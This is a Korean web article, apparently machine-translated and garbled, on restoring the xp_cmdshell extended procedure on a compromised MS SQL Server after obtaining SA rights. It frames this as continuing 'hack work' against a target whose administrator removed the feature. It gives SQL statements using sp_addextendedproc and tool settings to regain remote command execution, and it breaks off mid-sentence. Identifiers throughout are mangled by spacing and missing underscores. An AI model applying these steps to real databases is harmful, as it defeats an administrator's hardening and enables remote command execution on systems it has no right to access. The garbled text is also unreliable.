필요 한 도구:SQL Query Analyzer 와 SqlExec Sunx Version 제1 부분:관련 제거 xpcmdshell 보호 시스템 의 분석 요약:먼저 문 구 를 알 아 보 세 요:1.xp 를 제거 합 니 다.cmdshell 확장 과정 은 다음 과 같은 문 구 를 사용 합 니 다:if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'2.xp 추가cmdshell 확장 과정 방법 은 다음 과 같은 문 구 를 사용 하 는 것 입 니 다:spaddextendedproc xp_cmdshell,@dllname='xplog 70.dll'현상 보기:SA 권한 을 얻 은 후 원 격 으로 Sqllexec 로 cmd 명령 을 실행 하고 알림 SQLERROR,그러면 xp 를 없 앴 을 가능성 이 높 습 니 다.cmdshell。 이제 빼 진 xpcmdshell 후 복구 하 는 두 가지 방법:방법 1.SQL 사용 Query Analyzer 가 상대방 을 연결 한 후 직접 기록 하면 sp 가 편리 합 니 다.addextendedproc xp_cmdshell,@dllname='xplog 70.dll'방법 2.SqlExec 사용 Sunx 버 전 은 일단 SqlExec 에서... Sunx Version Format 옵션 에%s 를 입력 하고 CMD 옵션 에 sp 를 입력 하 십시오.addextendedproc 'xp_cmdshell','xpsql 70.dll'또는 Sql 2000 상황 에서 sp 사용addextendedproc 'xp_cmdshell','xplog 70.dll'은 SqlExec 를 별도로 사용 합 니 다. Sunx Version 으로 xp 제거cmdshell 의 방법 은 추가 할 때 선택 조건 과 같 습 니 다.그리고 sp 를 입력 하 십시오.dropextendedproc 'xp_cmdshell'하면 됩 니 다.두 번 째 부분:만약 에 상대방 이 xplog 70.dll 을 삭제 하거나 이름 을 바 꾸 었 다 면 우 리 는 다음 과 같은 방법 으로 우리 의 hack 작업 을 계속 할 것 입 니 다.다음 과 같은 현상 이 나타 나 면 xplog 70.dll 이 삭제 하거나 이름 을 바 꾸 었 을 가능성 이 높다 는 것 을 암시 합 니 다.검색 분석 기 에 sp 쓰기addextendedproc xp_cmdshell,@dllname='xplog 70.dll'알림 데이터베이스 에'xpcmdshell 의 대상.
이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
